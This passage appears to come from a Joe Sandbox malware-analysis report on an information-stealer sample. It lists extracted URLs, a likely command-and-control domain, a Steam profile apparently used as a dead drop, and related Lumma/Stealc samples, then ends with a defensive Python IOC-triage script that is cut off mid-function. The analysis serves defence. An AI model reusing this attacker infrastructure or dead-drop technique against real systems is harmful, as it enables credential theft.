https://community.fastly.steamstatic.com/ | alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steam.tv/ | alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampower | alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lev-tolstoi.com/ | alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1690595429.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754749506.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607970298.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607038049.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607038049.000000000356B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1665843537.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774860392.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1776241795.0000000003576000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://store.steampowered.com/privacy_agreement/ | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com:443/profiles/76561199724331900 | alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/points/shop/ | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmp | false
                                                                                                                  high
                                                                                                                  https://lev-tolstoi.com/lBalexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://ocsp.rootca1.amazontrust.com0:alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://steamcommunity.com/calexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://lev-tolstoi.com/Def4alexshlu.exe, 00000003.00000003.1607970298.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607038049.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1665750485.0000000003576000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://sketchfab.comalexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.ecosia.org/newtab/alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://lv.queniujq.cnalexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bralexshlu.exe, 00000003.00000003.1609220506.0000000003814000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.youtube.com/alexshlu.exe, 00000003.00000003.1754962264.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.google.comHI2alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://store.steampowered.com/privacy_agreement/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://lev-tolstoi.com:443/apilalexshlu.exe, 00000003.00000003.1754886041.0000000000C76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.google.com/recaptcha/alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://checkout.steampowered.com/alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgalexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/;alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://store.steampowered.com/about/alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://steamcommunity.com/my/wishlist/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://help.steampowered.com/en/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://steamcommunity.com/market/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://store.steampowered.com/news/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://lev-tolstoi.com/apiralexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYialexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://recaptcha.net/recaptcha/;alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://steamcommunity.com/discussions/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://store.steampowered.com/stats/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://medal.tvalexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://broadcast.st.dl.eccdnx.comalexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://store.steampowered.com/steam_refunds/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://steamcommunity.com/Galexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://x1.c.lencr.org/0alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
String: http://x1.i.lencr.org/0
  Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high
String: https://ch.search.yahoo.com/favicon.ico ; https://ch.search.yahoo.com/search
  Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp ; alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp ; alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high
String: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
  Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high
String: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
  Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high
String: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
  Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp ; alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp ; alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high
String: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
  Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp ; alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp ; alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high
String: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e
  Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp ; alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp ; alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high
IP              Domain              Country        ASN    ASN Name         Malicious
172.67.157.254  lev-tolstoi.com     United States  13335  CLOUDFLARENETUS  false
23.55.153.106   steamcommunity.com  United States  20940  AKAMAI-ASN1EU    false
                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1577338
                                                                                                                                                                                                              Start date and time:2024-12-18 12:07:09 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 4m 31s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:alexshlu.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@4/0@11/2
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 95%
                                                                                                                                                                                                              • Number of executed functions: 46
                                                                                                                                                                                                              • Number of non-executed functions: 158
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                              • Stop behavior analysis, all processes terminated
                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
06:08:00  API Interceptor  13x Sleep call for process: alexshlu.exe modified
Match           Associated Sample Name / URL  Detection  Threat Name
172.67.157.254  ardware-v1.exe                malicious  LummaC
                https://t.co/nq9BYOxCg9       malicious  HTMLPhisher
23.55.153.106   99awhy8l.exe                  malicious  LummaC
                5_6253708004881862888.exe     malicious  LummaC
                noll.exe                      malicious  Stealc, Vidar
                1fxm3u0d.exe                  malicious  LummaC
                2kudv4ea.exe                  malicious  LummaC
                ardware-v1.exe                malicious  LummaC
                ardware-v1.exe                malicious  LummaC
                sNWQ2gC6if.exe                malicious  LummaC
                66DJ2wErLz.exe                malicious  LummaC
                file.exe                      malicious  LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig
Match               Associated Sample Name / URL  Detection  Threat Name                                                    Context
lev-tolstoi.com     5_6253708004881862888.exe     malicious  LummaC                                                         104.21.66.86
                    1fxm3u0d.exe                  malicious  LummaC                                                         104.21.66.86
                    2kudv4ea.exe                  malicious  LummaC                                                         104.21.66.86
                    ardware-v1.exe                malicious  LummaC                                                         104.21.66.86
                    ardware-v1.exe                malicious  LummaC                                                         172.67.157.254
steamcommunity.com  99awhy8l.exe                  malicious  LummaC                                                         23.55.153.106
                    5_6253708004881862888.exe     malicious  LummaC                                                         23.55.153.106
                    noll.exe                      malicious  Stealc, Vidar                                                  23.55.153.106
                    1fxm3u0d.exe                  malicious  LummaC                                                         23.55.153.106
                    2kudv4ea.exe                  malicious  LummaC                                                         23.55.153.106
                    ardware-v1.exe                malicious  LummaC                                                         23.55.153.106
                    ardware-v1.exe                malicious  LummaC                                                         23.55.153.106
                    sNWQ2gC6if.exe                malicious  LummaC                                                         23.55.153.106
                    66DJ2wErLz.exe                malicious  LummaC                                                         23.55.153.106
                    file.exe                      malicious  Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Xmrig  104.102.49.254
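The two tables above (the contacted IP/domain/ASN list and the associated-sample matches) are the raw material for an IOC decision, and the decision is not "block both IPs". 172.67.157.254 is a Cloudflare edge address fronting the attacker domain lev-tolstoi.com, and 23.55.153.106 is an Akamai edge address for steamcommunity.com, a legitimate service that the report's string table shows being fetched for one specific profile URL; the "Malicious: false" in the IP table is the address reputation, not a verdict on the traffic. An IP-level block on either address hits other tenants of that CDN, so the domain is the blockable indicator for the first host and the fetched profile path is the detection indicator for the second. The following Python is an added example for this page and is not Joe Sandbox code: it transcribes a subset of the rows from the two tables (labelled as such in the code), pivots them into threat families and related-sample counts per host, and applies an assumed triage policy in which the shared-CDN ASN set and the abused-service set are assumptions, not data from the report.

```python
"""Triage of the network IOCs in this Joe Sandbox report.

Added example for this page; not Joe Sandbox code. The rows below are
transcribed from the report's IP/Domain/ASN table and from its
"associated samples" tables (IP and domain matches). The ASN and
abused-service sets are assumptions made for the triage policy.
"""
from collections import Counter, defaultdict

# Transcribed from the report's IP / Domain / Country / ASN table.
CONTACTED = [
    {"ip": "172.67.157.254", "domain": "lev-tolstoi.com",
     "asn": 13335, "asn_name": "CLOUDFLARENETUS"},
    {"ip": "23.55.153.106", "domain": "steamcommunity.com",
     "asn": 20940, "asn_name": "AKAMAI-ASN1EU"},
]

# (match key, associated sample, threat names) transcribed from the
# report's associated-sample tables; a subset is enough for the pivot.
ASSOCIATED = [
    ("172.67.157.254", "ardware-v1.exe", "LummaC"),
    ("172.67.157.254", "https://t.co/nq9BYOxCg9", "HTMLPhisher"),
    ("23.55.153.106", "99awhy8l.exe", "LummaC"),
    ("23.55.153.106", "5_6253708004881862888.exe", "LummaC"),
    ("23.55.153.106", "noll.exe", "Stealc, Vidar"),
    ("23.55.153.106", "1fxm3u0d.exe", "LummaC"),
    ("23.55.153.106", "2kudv4ea.exe", "LummaC"),
    ("23.55.153.106", "ardware-v1.exe", "LummaC"),
    ("23.55.153.106", "sNWQ2gC6if.exe", "LummaC"),
    ("23.55.153.106", "66DJ2wErLz.exe", "LummaC"),
    ("23.55.153.106", "file.exe",
     "LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig"),
    ("lev-tolstoi.com", "5_6253708004881862888.exe", "LummaC"),
    ("lev-tolstoi.com", "1fxm3u0d.exe", "LummaC"),
    ("lev-tolstoi.com", "2kudv4ea.exe", "LummaC"),
    ("lev-tolstoi.com", "ardware-v1.exe", "LummaC"),
]

# Assumption: ASNs whose edge addresses are shared by many unrelated
# tenants, so an IP-level block causes collateral damage.
SHARED_CDN_ASNS = {13335, 20940}

# Assumption: legitimate services that stealers abuse as dead drops;
# block the specific URL or profile, never the whole domain.
ABUSED_LEGIT_SERVICES = {"steamcommunity.com"}


def threat_families(associated):
    """Count threat names seen behind each match key (IP or domain)."""
    fam = defaultdict(Counter)
    for key, _sample, threats in associated:
        for name in threats.split(", "):
            fam[key][name] += 1
    return fam


def related_samples(associated, key):
    """Distinct associated sample names/URLs for one match key, sorted."""
    return sorted({sample for k, sample, _ in associated if k == key})


def triage(contacted, associated,
           shared_asns=SHARED_CDN_ASNS, abused=ABUSED_LEGIT_SERVICES):
    """Decide, per contacted host, what is safe to block and why."""
    fam = threat_families(associated)
    out = []
    for row in contacted:
        ip, dom = row["ip"], row["domain"]
        families = fam[ip] + fam[dom]          # Counter addition merges both pivots
        samples = set(related_samples(associated, ip)) | set(related_samples(associated, dom))
        if dom in abused:
            action = "detect-url"
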